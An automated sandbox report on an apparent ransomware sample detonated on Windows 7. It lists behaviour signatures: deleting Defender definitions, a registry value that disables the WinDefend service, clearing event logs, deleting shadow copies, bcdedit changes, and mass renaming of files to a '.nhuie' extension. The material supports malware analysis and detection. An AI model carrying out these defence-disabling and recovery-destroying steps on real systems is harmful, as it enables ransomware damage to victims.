memory/2916-261-0x000001774D5C6000-0x000001774D5C8000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2022-01-12 13:50

Reported

2022-01-12 13:53

Platform

win7-en-20211208

Max time kernel

56s

Max time network

14s

Command Line

"C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe"

Signatures

Deletes Windows Defender Definitions

evasion
Description Indicator Process Target
N/A N/A C:\Program Files\Windows Defender\MpCmdRun.exe N/A

Modifies Windows Defender Real-time Protection settings

evasion trojan

Modifies security service

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" C:\Windows\system32\reg.exe N/A

Clears Windows event logs

evasion ransomware

Deletes shadow copies

ransomware

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A

Reads user/profile data of web browsers

spyware stealer

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\HST.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_vZfD-V18bxw0.nhuie C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Office Setup Controller\Office64.en-us\Office64MUI.XML.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_wpqccwWqSQ00.nhuie C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BD08758_.WMF.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_nbxKFTnjfCw0.nhuie C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\HH00057_.WMF.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_s--HhbcbPHc0.nhuie C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18218_.WMF.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_ZVZ_GPEsNBQ0.nhuie C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18223_.WMF.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_R8NOtC1gppM0.nhuie C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Bibliography\Sort\TAG.XSL.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_I4sn0JUgCAg0.nhuie C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.services.nl_ja_4.4.0.v20140623020002.jar.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_QL9MgxSGUws0.nhuie C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-execution_zh_CN.jar.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_7NQdiSHeNsc0.nhuie C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler_ja.jar.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_aMOqLMxR8e80.nhuie C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\de-DE\js\settings.js C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\23.png C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\EST5.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_eu-dVV33kZY0.nhuie C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-windows_ja.jar.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_ev_-27KNk5E0.nhuie C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\management\jmxremote.access.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_LndxBTbxB_w0.nhuie C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\ja-JP\slideShow.html C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Yerevan.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_jIbtgodAJFg0.nhuie C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Thatch.xml.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_qaano4YQqxE0.nhuie C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21343_.GIF.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_munT2o7C26A0.nhuie C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\PDIR38F.GIF.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_J5scqS3DNII0.nhuie C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\win32\bridge\AccessBridgePackages.h.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_4z-hOkFJlRU0.nhuie C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.renderers.swt.nl_zh_4.4.0.v20140623020002.jar.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_N6L8jBrR-ow0.nhuie C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\create_form.gif.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr__AncrF1MLFE0.nhuie C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00257_.WMF.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_gvttde7q2MA0.nhuie C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR20F.GIF.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_0W4IcU_rBeU0.nhuie C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files\Windows Journal\en-US\jnwdui.dll.mui C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\SoftBlue\background.gif.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_TJIa3I7Bt5Y0.nhuie C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files\Microsoft Games\Chess\ChessMCE.png C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\en-US\js\service.js C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\DD01162_.WMF.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_1Nr22t1O6D40.nhuie C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0287415.WMF.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_rPylWeJ7pps0.nhuie C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\SoftBlue\TAB_OFF.GIF.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_0mCG4G8iwpM0.nhuie C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\about.html.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_Twee6Ne4A_00.nhuie C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\VisualElements\VisualElements_150.png.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_I_HOtQAf5Ao0.nhuie C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\java.policy.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_dvNCxjanJTE0.nhuie C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\8.png C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\WB01246_.GIF.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_p829PzQtYR80.nhuie C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Pets_btn-next-over-select.png C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\cache\binary\com.jrockit.mc.rcp.product_root_5.5.0.165303.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_PGm3nfRTeqk0.nhuie C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD10300_.GIF.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr__Opr0xkiY2Y0.nhuie C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\HH00693_.WMF.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_aRW8nZkXQvc0.nhuie C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0309480.JPG.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_Vou8PlWdtpQ0.nhuie C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0315612.JPG.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_mv7o_dCdLmY0.nhuie C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\Title_select-highlight.png C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\New_York.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_o9jzJrgCYY00.nhuie C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PSRCHLEX.DAT.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_iGsniWrgvb40.nhuie C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\Australia\Adelaide.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_ZLQq19hF2EQ0.nhuie C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\fr-FR\js\settings.js C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\bl.gif C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\distribute_form.gif.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_HSKbDrluAKM0.nhuie C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\DD00687_.WMF.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_r27Plihq67Y0.nhuie C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\ext\sunec.jar.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_rYfPHSQYOFs0.nhuie C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\Atlantic\Azores.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_q-u2tKYvW1M0.nhuie C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-last-quarter.png C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\ja-JP\gadget.xml C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME34.CSS.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_KwQsK0fpn2A0.nhuie C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\Stationery\OrangeCircles.jpg C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\EN00319_.WMF.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_Oohs1Dt8RLU0.nhuie C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02071U.BMP.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_0sN_Ad_TUnw0.nhuie C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\ja-JP\micaut.dll.mui C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\jfr\default.jfc.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_7ztsbxZLeEI0.nhuie C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\epl-v10.html.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_wigUdjK1l9E0.nhuie C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.operations.nl_zh_4.4.0.v20140623020002.jar.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_ouWHgh-wETo0.nhuie C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-jvm_ja.jar.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_rD5yhPmq55o0.nhuie C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A

Launches sc.exe

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1668 wrote to memory of 1548 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\system32\net.exe
PID 1668 wrote to memory of 1548 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\system32\net.exe
PID 1668 wrote to memory of 1548 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\system32\net.exe
PID 1548 wrote to memory of 648 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1548 wrote to memory of 648 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1548 wrote to memory of 648 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1668 wrote to memory of 1328 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\system32\net.exe
PID 1668 wrote to memory of 1328 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\system32\net.exe
